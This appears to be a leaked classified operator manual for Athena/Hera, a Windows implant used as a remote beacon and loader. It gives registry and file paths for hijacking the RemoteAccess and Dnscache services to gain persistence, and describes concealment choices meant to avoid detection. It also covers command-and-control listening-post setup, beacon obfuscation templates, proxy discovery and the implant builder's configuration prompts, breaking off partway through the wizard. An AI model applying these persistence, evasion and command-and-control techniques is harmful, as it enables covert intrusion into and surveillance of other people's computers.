SECRET//NOFORN
Engineering Development Group
Athena / Hera
Version 1.0
User Manual
29 February 2016
Classified By: 2127215
Reason: 1.4(c)
Declassify On: 25X1, 20640205
Derived From: CIA NSCG MET S-06
SECRET//NOFORN
SECRET//NOFORN
________________________________________________________________________
CHANGE LOG
Doc
Rev
Doc Date
Rev
By
Change Description
11/19/2015 ATI Initial creation
SECRET//NOFORN
Reference
Authority/
Approval
Date
SECRET//NOFORN
________________________________________________________________________
TABLE OF CONTENTS
ATHENA / HERA.........................................................................................................................I
VERSION 1.0.................................................................................................................................I
USER MANUAL...........................................................................................................................I
1. (U) SCOPE..................................................................................................................................1
2. (U) SYSTEM OVERVIEW.......................................................................................................1
3. (S//NF) ATHENA/HERA CONCEPT OF OPERATION (CONOP)....................................2
3.1 (U) SUMMARY OF CAPABILITIES............................................................................................3
4. (S//NF) SYSTEM VERSIONS..................................................................................................3
4.1 (S//NF) ATHENA.....................................................................................................................3
4.2 (S//NF) HERA.........................................................................................................................4
4.3 (S//NF) ATHENA/HERA VERSION COMPARISON....................................................................5
5. (U) LISTENING POST.............................................................................................................5
5.1 (U) INSTALLATION.................................................................................................................6
5.2 (U) CONFIGURATION..............................................................................................................9
5.3 (U) MANAGEMENT...............................................................................................................10
6. (U) BUILDER..........................................................................................................................11
6.1 (U) USAGE............................................................................................................................11
6.2 (U) COMMAND LINE OPTIONS.............................................................................................12
6.3 (U) WIZARD........................................................................................................................13
6.4 (U) CONFIGURATION............................................................................................................15
6.5 (U) OUTPUT..........................................................................................................................19
7. (U) IMPLANT INSTALLATION..........................................................................................23
7.1 (U) OVERT INSTALLATION ON DISK MODE.........................................................................23
7.2 (U) RANDOM ACCESS MEMORY-ONLY (RAM-ONLY) MODE.............................................23
7.3 (U) IMPLANT OFFLINE INSTALLATION................................................................................23
8. (U) TASKER............................................................................................................................25
8.1 (U) USAGE............................................................................................................................26
8.2 (U) COMMAND LINE OPTIONS.............................................................................................26
8.3 (U) USER INTERFACE...........................................................................................................28
8.4 (U) USER INTERFACE EXAMPLE..........................................................................................34
8.5 (U) OUTPUT..........................................................................................................................36
SECRET//NOFORN
i
SECRET//NOFORN
________________________________________________________________________
9. (U) PARSER.............................................................................................................................36
9.1 (U) USAGE............................................................................................................................37
9.2 (U) COMMAND LINE OPTIONS.............................................................................................37
9.3 (U) PROCESSING RESPONSES AND SAFETIES........................................................................38
9.4 (U) OUTPUT..........................................................................................................................38
9.5 (S//NF) ERROR CODES........................................................................................................41
10. (U) NOTES AND OBSERVATIONS...................................................................................42
10.1 (U) INSTALLATIONS OF HERA REQUIRE A REBOOT FOR ELEVATED ACCESS PRIVILEGES 42
10.2 (U) INSTALLER AND RAM_ONLY VERSIONS SHOULD NEVER BE RUN FROM DISK.......42
10.3 (U) BUILDER DOES NOT PRODUCE A “BIT COPY” OF AN EXISTING CONFIGURED IMPLANT
....................................................................................................................................................42
10.4 (U) OFFLINE INSTALLER MAY REPORT A FALSE FAILURE ON WINDOWS 10
INSTALLATIONS..........................................................................................................................42
10.5 (S//NF)TIMEOUTS MAY OCCUR WHILE PROCESSING LARGE FILES..................................42
11. (U) ACRONYMS / ABBREVIATIONS...............................................................................43
LIST OF FIGURES
FIGURE 1 – (S//NF) ATHENA/HERA CONCEPT OF OPERATION...................................2
FIGURE 2 - (S//NF) LISTENING POST DIRECTORY HIERARCHY.................................6
FIGURE 3 - (S//NF) UBUNTU REPOSITORY LISTING EXAMPLE...................................6
FIGURE 4 - (S//NF) OPTIONAL SSL CERTIFICATE CREATION.....................................6
FIGURE 5 - (S//NF) FAILED SETUP.PY SCRIPT OUTPUT.................................................7
FIGURE 6 - (S//NF) PIP OUTPUT FOR MANUAL BOTTLE INSTALL..............................7
FIGURE 7 - (S//NF) COMPLETING SETUP.PY SCRIPT OUTPUT.....................................8
FIGURE 8 - (S//NF) LISTENING POST CONFIGURATION FILE......................................9
FIGURE 9 - (S//NF) BUILDER COMMAND LINE OPTIONS.............................................12
FIGURE 10 - (S//NF) SYSTEM BINARY PATH.....................................................................13
FIGURE 11 - (S//NF) BUILDER WIZARD REVIEW............................................................15
FIGURE 12 - (S//NF) EXAMPLE RECEIPT FILE - XML....................................................22
FIGURE 13 - (S//NF) BUILDER OUTPUT FILES..................................................................22
FIGURE 14 - (S//NF) WINDOWS OFFLINE INSTALLER...................................................24
FIGURE 15 - (S//NF) LINUX OFFLINE INSTALLATION...................................................25
FIGURE 16 - (S//NF) TASKER COMMAND LINE OPTIONS.............................................26
SECRET//NOFORN
ii
SECRET//NOFORN
________________________________________________________________________
FIGURE 17 - (S//NF) TASKER MAIN MENU........................................................................28
FIGURE 18 - (S//NF) TASKER SHELL INTERFACE EXAMPLE – PART 1....................35
FIGURE 19 - (S//NF) TASKER SHELL INTERFACE EXAMPLE – PART 2....................35
FIGURE 20 - (S//NF) PARSER COMMAND LINE OPTIONS.............................................37
SECRET//NOFORN
iii
SECRET//NOFORN
________________________________________________________________________
LIST OF TABLES
TABLE 1 - (U) APPLICABLE DOCUMENTS..........................................................................1
TABLE 1 - (U) APPLICABLE DOCUMENTS..........................................................................1
TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS........................................................1
TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS........................................................1
TABLE 3 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................3
TABLE 4 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................4
TABLE 5 - (S//NF) DIFFERENCES BETWEEN VERSIONS.................................................5
TABLE 6 - (S//NF) SIMILARITIES BETWEEN VERSIONS.................................................5
TABLE 7 - (S//NF) STEP-BY-STEP IMPLANT CONFIGURATION INSTRUCTIONS...15
TABLE 8 - (S//NF) REQUIRED OFFLINE INSTALLER COMPONENTS........................25
TABLE 9 – (U) COMMAND FILE ENCODING.....................................................................36
TABLE 10 - (U) ERROR CODES..............................................................................................41
TABLE 11 - (U) ACRONYMS AND ABBREVIATIONS.......................................................43
SECRET//NOFORN
iv
SECRET//NOFORN
________________________________________________________________________
1. (U) Scope
(U) This document establishes the User Guide for Athena v1.0 and for Hera v1.0. See Section 4
for a discussion of the specific characteristics of each system.
Table 1 - (U) Applicable Documents
Description
Athena v1.0 User Requirement Document –
OPS0001051
Hera v1.0 User Requirement Document –
OPS0001743
Athena v1.0 IV&V Report
Date
Version
3-Feb-2016
REV G
15-Feb-2016
REV B
TBS
TBS
2. (U) System Overview
(S//NF) The Athena System fulfills COG/NOD's need for a remote beacon/loader. Table 2 shows
the system components available in Athena/Hera v1.0. The target computer operating systems
are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32bit/64-bit, Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10. Ubuntu
v14.04 is the validated Linux version. Apache 2.4 is the validated web server for the Listening
Post.
Table 2 - (S//NF) Athena System Components
Component /
Application
Builder
Tasker
Parser
Listening Post
Installer
RamOnly
OffLine
Function
Provides the ability to build packages
for specified targets. (e.g. installers,
offline scripts, ram-only modules and
receipts)
Provides the ability to task a specific
implant. (e.g. get, put, set, memload,
memunload, delete and uninstall)
Provides the ability to decode
responses from the target.
Provides interaction with the remote
target. All batch tasking files are
copied to this server for processing.
Installs the tool onto the target system
(DLL file)
Execute a diskless version of the
implant as a DLL on the target
system (DLL file)
Install the tool onto the target system
with physical access using Linux
Boot or Windows Recovery Console.
Operating System
Language
Used
Linux / Windows
Python 3.4
Linux / Windows
Python 3.4
Linux / Windows
Python 3.4
Linux(Apache)
Python 3.4
Windows x86/x64
C++
Windows x86/x64
C++
Linux / Windows x86/x64
bash/C++
SECRET//NOFORN
1
SECRET//NOFORN
________________________________________________________________________
3. (S//NF) Athena/Hera Concept of Operation (CONOP)
Figure 1 – (S//NF) Athena/Hera Concept of Operation
(S//NF) Figure 1 depicts the Athena Concept of Operation. The Athena/Hera system consists of a
Builder, Tasker, Parser, Listening Post, Installer, ramonly and offline capabilities.
(S//NF) The operator uses the Builder (builder.py) to tailor an implant for the specific
operational scenario. The operator then deploys the configured implant (Installer) on a target
computer.
(S//NF) Once activated, the Installer will modify the target registry and drop the host file
(IprCache.dll default) and data file (ras.cache default) in their specified locations. The
installation tool will restart the RemoteAccess service and launch the Athena Engine in the
netsvcs svchost.exe process. The installed tool will beacon to the Listening Post (LP) to receive
tasking.
(S//NF) The system also allows the Operator to configure certain behavior of the tool at runtime
during beacon events. The Tasker (tasker.py) is used to task the implant. The Parser
(parser.py) is used to decode the results retrieved from the Listening Post.
Note
(S//NF) The Installer must be executed as an Administrator
or any other user account with permissions to start/stop
services, modify the registry and write to the system32
directory/subdirectories.
SECRET//NOFORN
2
SECRET//NOFORN
________________________________________________________________________
3.1 (U) Summary of Capabilities
(S//NF) The following is a summary of the system capabilities:
• Executes on the Windows XP (SP3)/7/8.1/2008/2012/10 (x86/x64) operating systems.
• Provides a beaconing capability that provides configuration and task handling
• Provides memory loading/unloading of NOD Persistence Specification DLLs on the
target system
• Provides delivery and retrieval of files to/from a specified directory on the target system
• Allows the operator to configure settings during runtime (while the implant is on target)
4. (S//NF) System Versions
(S//NF) The system was designed to allow a base installation (Athena) and an extended
installation (Hera). Both versions contain the full command set defined in this document. This
section will describe the differences between the implementations and configurations.
4.1 (S//NF) Athena
(S//NF) Athena is the primary implementation for use on WinXP through Win10 operating
systems. This implementation uses the RemoteAccess service for persistence, ZLIB for
compression and XTEA for encryption on disk.
4.1.1 ((S//NF) On-Target Footprint
(S//NF) The Athena implant is compliant with the NOD Persistence Specification for persistent
DLLs and provides its own persistence mechanism. Athena will be hosted by the RemoteAccess
service. There is an external DLL that this service will load that is not a service DLL.
Table 3 - (U) Installed File and Registry Resources
File System Modification Location
Configuration Item
Description
%SystemRoot%\\System32\\
Microsoft\\Crypto\\RAS\\iprcache.dll
TARGET_FILENAME
The overt target file location on disk that is
referenced by the RemoteAccess service.
%SystemRoot%\\System32\\
CodeIntegrity\\ras.cache
DATA_FILENAME
The overt data file location on disk that
contains the package file (config, engine,
etc.).
SYSTEM\\CurrentControlSet\\Services\\
RemoteAccess\RouterManagers\\IP
Start = 2
Type = 20
SYSTEM\\CurrentControlSet\\Services\\
RasMan
Start = 2
Type = 20
SYSTEM\\CurrentControlSet\\Services\\
SStpSvc
Start = 2
Type = 20
SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\
RouterManagers\\Ip
DLLPath= %SystemRoot%\\System32\\iprtrmgr.dll
DLLPath
This overt registry entry forces the
RemoteAccess service to load the target
DLL before loading the true support DLL.
None
This overt registry entry is updated to
allow this dependent service to start when
the RemoteAccess service starts.
None
This overt registry entry is updated to
allow this dependent service to start when
the RemoteAccess service starts.
None
(Windows10 Only)
Used by RemoteAccess Service
SECRET//NOFORN
3
SECRET//NOFORN
________________________________________________________________________
File System Modification Location
Configuration Item
Description
SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\
RouterManagers\\Ip
GlobalInfo=
SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\
RouterManagers\\Ip
ProtocolId= 0x00000021
None
(Windows10 Only)
Used by RemoteAccess Service
None
(Windows10 Only)
Used by RemoteAccess Service
4.2 (S//NF) Hera
(S//NF) Hera is a secondary implementation for Windows 8 through Windows 10. The output
receipt file will contain a special key 1 in the XML file. This
implementation uses the Dnscache service for persistence, BZIP2 for compression and AES 256
for encryption on disk.
4.2.1 ((S//NF) On-Target Footprint
(S//NF) The Hera implant is compliant with the NOD Persistence Specification for
persistent DLLs and provides its own persistence mechanism. Hera will be hosted
by the DNSClient service. There is an external DLL that this service will load that is
not a service DLL.
Table 4 - (U) Installed File and Registry Resources
File System Modification Location
Configuration Item
Description
%SystemRoot%\\System32\\
Microsoft\\Crypto\\DNS\\dnscache.dll
TARGET_FILENAME
The overt target file location on disk
that is referenced by the Dnscache
service.
%SystemRoot%\\System32\\
CodeIntegrity\\dns.cache
DATA_FILENAME
The overt data file location on disk that
contains the package file (config,
engine, etc.).
SYSTEM\CurrentControlSet\Services\
Dnscache
Start = 2
Type = 20
Parameters\extension
This overt registry entry forces the
Dnscache service to load the target
DLL before loading the true support
DLL.
SYSTEM\CurrentControlSet\Services\
Dnscache
ImagePath
%SystemRoot%\system32\svchost.exe
-k netsvcs
SYSTEM\CurrentControlSet\Services\
Dnscache
ObjectName
LocalSystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Svchost
Netsvcs
Ensure that the dnscache service is
included on the list of netsvcs.
4.2.2 (U) Installation Notes
(S//NF) The installation will hijack the Dnscache service. On Windows 7 and 8, this service is
running in a netsvcs instance by default but on Windows 8.1 and Windows 10, this service runs
as NetworkService. The NetworkService user context has reduced security capability on the
system. Due to the srvhost implementation, the service will only run in the netsvcs context at
next reboot. To account for this deficiency and still provide immediate execution after
installation, the existing service will run as NetworkService until next reboot at which time the
System user netsvcs will be engaged.
SECRET//NOFORN
4
SECRET//NOFORN
________________________________________________________________________
4.3 (S//NF) Athena/Hera Version Comparison
Table 5 - (S//NF) Differences between Versions
Feature
Athena
Hera
Hash (function names)
Mask(local encryption)
Packing Mask
String Mask
Compilation
Module Compilation
(actual modules using alternate compilation)
Adler hash – from zlib
XTEA with key increment
0x3B
0x5D8E1792
MSVC 2013
Installer.dll
Host.dll
Ram_only.dll
RemoteAccess
ZLIB
Superfast hash
AES with reduced key space
0x5C
0xAF27D2C9
LLVM 3.7.0
Installer.bravo.dll
Host.bravo.dll
Ram_only.bravo.dll
Dnscache
BZip2
Persistence
Compression
Table 6 - (S//NF) Similarities between Versions
Feature
Commonality
Data file
Business Logic
File format and content is the same but the masking is different
The command module uses different masking but the code is compiled with MSVC and will look similar.
This module is dynamically loaded.
The engine module has mostly the same code between the two modules and is complied with MSVC and
will look similar. This module is dynamically loaded.
The uninstall module will be almost identical between versions. This module is dynamically loaded.
The import tables between (Installer/host/ram_only) will be similar. Additional unused imports have been
included in the Hera version.
The communications between the versions has not changed (i.e., RSA with a generated session AES 256
key)
The state file logic is the same and the stored files may have similar information but will be masked
differently on disk.
No function abstractions have been incorporated between the versions. Functionally, these two versions
should produce virtually the same function call list.
Engine
Uninstall
Imports
Communications
State File Logic
Function Ordering
5. (U) Listening Post
(S//NF) The Listening Post (LP) uses a Bottle Python Web Framework WSGI interface to
simplify the Listening Post interface between the targets and the server. The tasker.py tool
generates encrypted tasking that is placed on the Listening Post for distribution to client targets.
The targets respond with an encrypted file that can be decrypted with the parser.py tool.
(S//NF) The Listening Post was designed to function as a simple file server to deliver tasking to
the target. The LP server was designed to run with Apache Server (2.4) running on Ubuntu
v14.04. Tasking files generated by the Tasker are placed into user configured directories
generated by the server setup script. The target will beacon into the LP for tasking and the LP
will respond by parsing client directories and sending back data from the corresponding
directory. The directory is organized in a single parent folder to multiple child folders specified
by the implant’s 4 character identifier. The directory hierarchy is laid out as follows:
SECRET//NOFORN
5
SECRET//NOFORN
________________________________________________________________________
ROOT folder
|---- server log files
|---- Parent ID folder (e.g., TEST)
|
|---- parent tasking files
|
|---- Child ID folder
|
|
|-- inbox folder (files received from the implant)
|
|
|- Responses and safety files
|
|
|-- outbox folder (files to be sent to the implant)
|
|
|- tasking files
|
|---- Child ID folder
|
…
|---- Parent ID folder
…
Figure 2 - (S//NF) Listening Post Directory Hierarchy
5.1 (U) Installation
(S//NF) The Listening Post server setup is performed by the setup.py script. The python script
setup.py should be run on Ubuntu v14.04. The setup script will install all required files
automatically if an Ubuntu repository can be reached. The following is a list of required
packages:
•
•
•
•
•
Apache 2.4
Apache mod_wsgi module
Python 3.4
Python pip (only used to retrieve bottle)
Python bottle web framework
(S//NF) Validate that the current Ubuntu instance has the correct repository location. This can be
validated by viewing the source.list file.
> /etc/apt/sources.list
deb
deb
deb
deb
http://repo.devlan.net/ubuntu
http://repo.devlan.net/ubuntu
http://repo.devlan.net/ubuntu
http://repo.devlan.net/ubuntu
trusty main universe multiverse restricted
trusty-security main universe multiverse restricted
trusty-updates main universe multiverse restricted
trusty-backports main universe multiverse restricted
Figure 3 - (S//NF) Ubuntu Repository Listing Example
(S//NF) The SSL component of the install requires a valid SSL certificate. By selection NO to
the option “use pre-existing SSL certificate and key”, will generate a new certificate for you.
OpenSSL can also be used to generate a certificate. The follow example shows how this can be
done.
>
>
>
>
openssl genpkey -algorithm RSA -out a.key
openssl req -new -key a.key -out a.req -subj /CN=1.1.1.1
openssl x509 -req -in a.req -signkey a.key -out a.cert
sudo apt-get update
Figure 4 - (S//NF) Optional SSL Certificate Creation
(S//NF) To run the installation tool from the current Ubuntu instance, copy the Listening Post
directory from the installation disk to the Ubuntu v14.04 instance. The Ubuntu v14.04 Linux
distribution already contains Python 3.4 pre-installed. Use the provided installation script to
complete the installation.
SECRET//NOFORN
6
SECRET//NOFORN
________________________________________________________________________
> sudo python3 setup.py -install
~/Desktop/listeningpost$ sudo python3 setup.py -install
Verifying packages are installed ...
Apache is not installed. Do you want to install? (Y/N) default: Y
Installing Apache...
Mod-wsgi is not installed. Do you want to install? (Y/N) default: Y
Installing Mod-wsgi...
Python-pip is not installed. Do you want to install? (Y/N) default: Y
Installing pip3...
Python Bottle is not installed. Do you want to install? (Y/N) default: Y
Installing Bottle...
Failed installed. Try manual install.
One or more install packages did not exist or failed. Continue? (Y/N) default: N
y
Copying files to /var/www/html
Server configuration file options:
Enter full path to tasking directory, i.e. /var/www/html/data:
Server configuration file options:
Enter full path to tasking directory, i.e. /var/www/html/data: ^CTraceback (most recent
call last):
File "setup.py", line 315, in
install()
File "setup.py", line 42, in install
write_config()
File "setup.py", line 132, in write_config
root_dir = input("Enter full path to tasking directory, i.e. {}/data:
".format(www_dir))
Figure 5 - (S//NF) Failed setup.py Script Output
(S//NF) Should the install script fail to find bottle, the Operator must install bottle manually.
This condition can occur if a pip server cannot be found or if bottle is not installed on the pip
server. To support this situation, bottle has been included on the Listening Post distribution disk.
Use the following command to install bottle manually:
sudo pip3 install bottle/bottle-0.12.8.tar.gz
> sudo pip3 install bottle/bottle-0.12.8.tar.gz
Unpacking ./bottle-0.12.8.tar.gz
Running setup.py (path:/tmp/pip-0C2Zam-build/setup.py) egg_info for package from
file:///home/xxx/Desktop/listeningpost/bottle/bottle-0.12.8.tar.gz
Installing collected packages: bottle
Running setup.py install for bottle
changing mode of build/scripts-2.7/bottle.py from 644 to 755
changing mode of /usr/local/bin/bottle.py to 755
Successfully installed bottle
Cleaning up...
Figure 6 - (S//NF) pip Output for Manual Bottle Install
(S//NF) If the installation did not complete, it can be restarted to complete the installation.
> python3 setup.py -install
Verifying packages are installed ...
Copying files to /var/www/html
Server configuration file options:
Enter full path to tasking directory, i.e. /var/www/html/data:
Nothing was entered, using /var/www/html/data
/var/www/html/data does not exists, creating.
Enter name of inbound folder: IN
SECRET//NOFORN
7
SECRET//NOFORN
________________________________________________________________________
Enter name of outbound folder: OUT
Enter URL path of tasking resources (comma separated), i.e. /blog/comments, /php/id: /
Enter URL path of web resources (comma separated), i.e. /, /web: /html
Enabling mod-wsgi
Disabling default site.
Use pre-existing SSL certificate and key? (Y/N) default: N
Generating a 2048 bit RSA private key
......................+++
..+++
writing new private key to 'fileserver.key'
----You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
----Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
Moving cert to /etc/ssl/certs/fileserver.crt
Moving key to /etc/ssl/private/fileserver.key
Enabling SSL site 001-default-ssl.conf
Disabling port 80.
Restarting services...
Install done.
Figure 7 - (S//NF) Completing setup.py Script Output
(S//NF) After installing the required packages, the setup script will modify Apache to enable
SSL on port 443 and generate any required SSL keys and certificate if not supplied. In addition,
the setup script will ask to setup the directories where the tasking files will reside.
(S//NF) After installation is complete, make sure to check that the file/folder exists, proper
permissions have been applied, and Apache is successfully running on port 443. The setup script
expects a default installation of Apache 2.4. If any configuration files have been modified, the
setup script may not work correctly. You may have to manually modify the /etc/apache2/sitesavailable/001-default-ssl.conf to point to the correct location of your SSL keys and certs. In
addition, add the following line under DocumentRoot, to enable WSGI:
WSGIScriptAlias / /var/www/html/app.wsgi
(S//NF) The directory /var/www/html should contain three files; app.wsgi, server.py, and
config.json. To disable port 80, edit /etc/apache2/ports.conf and comment out the line with
"Listen 80".
(U) Some common Apache commands are listed below:
sudo a2enmod - to enable a module, i.e. sudo a2enmod wsgi
sudo a2dissite - to disable a site configuration
sudo a2ensite - to enable a site configuration
sudo service apache2 restart - restart Apache
sudo service apache2 start
sudo service apache2 stop
tail –f /var/log/apache2/access.log
SECRET//NOFORN
8
SECRET//NOFORN
________________________________________________________________________
5.2 (U) Configuration
(S//NF) The Listening Post instance can be configured with a local JSON encoded text file called
“config.json”. The setup script will write out a configuration file, config.json, as well as copy the
corresponding required Server python files to /var/www/html. The config.json file contains the
information generated by the setup script and is read by the Server python script on start-up. The
config.json can be edited manually to add/modify/delete any user updates, if edits are made the
Apache server should be restarted to insure everything is refreshed. The config.json contains,
{
"DATA_URLS": ["/blog/comm", "/php/id", "/"],
"ROOT_DIR": "/srv/athena",
"WEB_URLS": ["/html", "/", "/web"],
"OUT_FOLDER": "OUT",
"IN_FOLDER": "IN",
"HOST" : "0.0.0.0",
"PORT" : "",
"LOG_SIZE" : "65536",
"HTTP_ERROR_CODE" : 200
}
Figure 8 - (S//NF) Listening Post Configuration File
Warning
(S//NF) The values in DATA_URLS must contain the value
configured in the Implant Builder field, Beacon URL Path for
LP. The values in WEB_URLS must contain the value
configured in the LP Builder field, URL Path for Web
Resources.
1) DATA_URLS – This is the virtual URL path sent from the target to inform Apache to forward requests to
the Athena Listening Post.
2) ROOT_DIR - This is the root directory location where the parent folder must be created with the 4
character identifier configured for the target.
3) WEB_URLS – This value defines the URL path of web resource. This can be any URL path that you plan
on delivering normal web content (must not be the same as tasking URL path)
4) DATA_URLS - Tasking directory - this is the root directory location where the parent folder must be
created with the 4 character identifier configured for the target.
5) OUT_FOLDER - This folder contains the tasking files generated by the Tasker that will be sent to the
target for processing.
6) IN_FOLDER - This folder contains the files that the target will upload back to the LP for post-processing
by the Parser.
7) HOST – This is the NIC binding address. (default 0.0.0.0)
8) PORT – This value defines the web port. (default 443)
9) LOG_SIZE – This value defines the size of a single log file. (default 64K) By setting this value to zero, no
logging information will be stored. The server will store at most 5 backup logs in the current instance.
10) HTTP_ERROR_CODE – This value defines the error code returned to the target when an error occurs. It
is the responsibility of the system administrator to validate alternate return codes to support forwarding or
other capabilities.
HTTP Status codes for failure:
a)
b)
c)
d)
407 - proxy authentication failed
502, 504 - proxy or gateway failure
600, 601, 602, 603 - squid error codes
All other status codes indicates successful beacon.
SECRET//NOFORN
9
SECRET//NOFORN
________________________________________________________________________
Note
(U) URLs should start with a slash ("/") but should not have
an ending slash.
5.3 (U) Management
(S//NF) To specify initial tasking for a target (i.e., when the target first beacons to the LP), create
a folder on the LP with the parent ID. Place any generic tasking created for the family of targets
in this parent folder. When a new target beacons, the LP creates a child folder for the specific
child ID and copies the parent tasking into the child folder. The LP only copies the parent tasking
to the child folder once -- when the child folder is initially created. On subsequent beacons, all
tasking will be pulled directly from the child folder. The Operator must manually copy the
target’s specific tasking from the Tasker to the target’s OUT directory as well as move files
from the target’s IN directory for processing by the Parser tool.
(S//NF) If there is both parent and child tasking for a target, it will be processed in the following
order, based on the user-configured priority:
1. Child tasking
a. Non-persistent
b. Persistent
2. Parent tasking
a. Non-persistent
b. Persistent
Note
(S//NF) All child-specific tasking will take precedence over
any existing parent tasking.
5.3.1 (U) URL Query:
(S//NF) To obfuscate the URL request and prevent caching, each request from the target will
append a template with random data to each request. The following strings define the templates
for processing URL queries.
?keyword=%s&matchtype=p
?ping?clientid=%s
?event?a=%sy=false
?h.key=%s
?activityi;src=%s
5.3.2 (U) Request Headers
(S//NF) The request header will include user configured headers as well as default ones.
User Agent: (user-configured)
Accept: (user-configured)
Accept-Language: (user-configured)
Accept-Encoding: (user-configured)
SECRET//NOFORN
10
SECRET//NOFORN
________________________________________________________________________
Host: (user-configured domain beacon names)
Connection: keep-alive (default)
Cache-Control: private, no-cache, no-store, max-age=0\r\n (default)
Cookie: session-id= (default parent ID and generated child ID masked with a generated key)
5.3.3 (U) Data Formating
(S//NF) Before being sent back to the LP, the data undergoes the following transformations:
•
•
•
•
•
•
Data hash is computed using zlib adler32
Data is zlib compressed
Data is RSA encrypted
Data hash is appended to the data
Data signed digest is appended to the data
Masked parent and child ID are appended to the data
5.3.4 (U) Communications Settings
(S//NF) The connection logic to the LP takes into account the user configured proxy, IE
proxy, WPAP proxy, and direct connection. The CommMod will save and send back
to the LP any proxy information that was found for later use. The CommMod will use
the connection settings in the following order:
1. User configured Proxy settings
2. Direct Connection
3. IE previously saved Proxy settings
4. WPAD previously saved Proxy settings
5. Try the IE Proxy. If it is a new proxy setting then it will be saved for future use and sent back
to the LP.
6. Try the WPAD Proxy. If it is a new proxy setting then it will be saved for future use and sent
back to the LP.
6. (U) Builder
(S//NF) Some general usage comments are presented below:
•
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.
•
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
•
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.
6.1 (U) Usage
(S//NF) This section contains information for configuring an implant. Figure 9 below shows the
command line options for the Builder.
SECRET//NOFORN
11
SECRET//NOFORN
________________________________________________________________________
Warning
(S//NF) Implant configuration may be completed on the lowside; however, the operator should be aware that
cryptographic key data will be in the clear.
(S//NF) By default, the Builder will walk the operator through the process of configuring an
implant (via the wizard) that will be deployed to a target computer. Alternatively, the operator
can also input all configuration values via command line arguments in order to build an implant
with a single command.
Builder
usage: builder.py [-h] [-i SYSTEM_BINARY_PATH] [-r SYSTEM_IMPORT_XML]
[-o SYSTEM_EXPORT_PATH] [-w] [-b] [--debug]
Builder Configuration
optional arguments:
-h, --help
show this help message and exit
-i SYSTEM_BINARY_PATH, --input SYSTEM_BINARY_PATH
This argument provides the location of the raw binary
data files. (NOTE: .\bin is the default path).
-r SYSTEM_IMPORT_XML, --receipt SYSTEM_IMPORT_XML
This argument defines an existing receipt filename to
be used for default values.
-o SYSTEM_EXPORT_PATH, --output SYSTEM_EXPORT_PATH
This argument provides the output directory path to
store the target files (NOTE: .\builder_output is the
default path).
-w, --wizard
This argument will request information from the user
via the wizard.
-b, --bravo
This argument builds the Athena BRAVO implementation.
--debug
This argument allows debugging information to be
included in the output directory.
Figure 9 - (S//NF) Builder Command Line Options
6.2 (U) Command Line Options
The builder.py script has multiple command line options. For most users, no command line
options are required. The local directory will be used to output results.
Usage: python.exe builder.py
6.2.1 (U) System Binary Path
(S//NF) This argument provides the location of the raw binary data files. The default location is
in the current directory in the BIN folder. Figure 10 (below) shows the files that must reside in
the system binary path.
SECRET//NOFORN
12
SECRET//NOFORN
________________________________________________________________________
BIN
├───offline
│
functions.sh
│
linux.sh
│
reged.static
│
target_x64.ini
│
target_x86.ini
├───x64
│
command.axe
│
engine.axe
│
host.dll
│
install.dll
│
offline.exe
│
ram_only.dll
│
uninstall.axe
└───x86
command.axe
engine.axe
host.dll
install.dll
offline.exe
ram_only.dll
uninstall.axe
- linux offline files
- 64 bit implant components
- 32 bit implant components
Figure 10 - (S//NF) System Binary Path
6.2.2 (U) System Import XML
(S//NF) This argument provides the location of the existing receipt file to be used for
configuration information. This option is used to input specific information into this build (e.g.
use this option to create an exact copy of an existing build).
6.2.3 (U) System Export Path
(S//NF) This argument provides the output directory path to store the target files. By default, the
.\builder_output path is the location for the output. A sub-directory called RECEIPTS is
created in this directory to contain all receipts created by this installation. This simplifies parsing
by having all receipts in a single location. When creating implants for a group of targets, the
parent name will be in the output directory (e.g. .\builder_output\test). If a build is generated for
a specific child, the child name will be incorporated into the name of the output directory (e.g.
.\builder_output\test_ABCD0086).
6.2.4 (U) Debug
(S//NF) This argument allows debugging information to be included in the output directory.
When this option is selected, an additional debug directory is included in the output. This
contains all intermediary files required by the Builder and can be used to support debugging.
6.3
(U) Wizard
(S//NF) The following (Figure 11) shows an example of using the wizard option of the Builder in
order to configure and build an implant. Select the default value by using ENTER key.
$ python.exe builder.py
Builder
Generating client RSA key pair
Generating server RSA key pair
Athena Wizard:
This wizard will guide you through the input options for the Athena tool.
Press enter to accept default value.
SECRET//NOFORN
13
SECRET//NOFORN
________________________________________________________________________
Target - Parent ID (4 chars)
default:[RnzI]
new value:
Target - Child ID (number - dword)
default:[]
new value:
Target - dynamic data config type (internal,file,registry)
default:[internal]
new value:
Beacon - Interval in seconds (number)
default:[86400]
new value:
Beacon - Jitter as a percentage of Interval 0..100 (number)
default:[5]
new value:
Beacon - Boot Delay in seconds (number)
default:[60]
new value:
Beacon - Hibernation Delay in seconds (number)
default:[60]
new value:
Beacon - Tasking Delay in seconds (number)
default:[60]
new value:
Beacon - Domains (LP Server DNS hostname or IP Addresses separated by a comma)
default:[None]
new value: abc.com
Beacon - Port (number)
default:[443]
new value:
Beacon - Proxy Port NOTE:0=disable (number)
default:[0]
new value:
Beacon - User Agent String (string)
default:[Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)]
new value:
Beacon - URL Path for LP (string)
default:[/]
new value:
Beacon - Accept Header (string)
default:[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
new value:
Beacon - Accept Language Header (string)
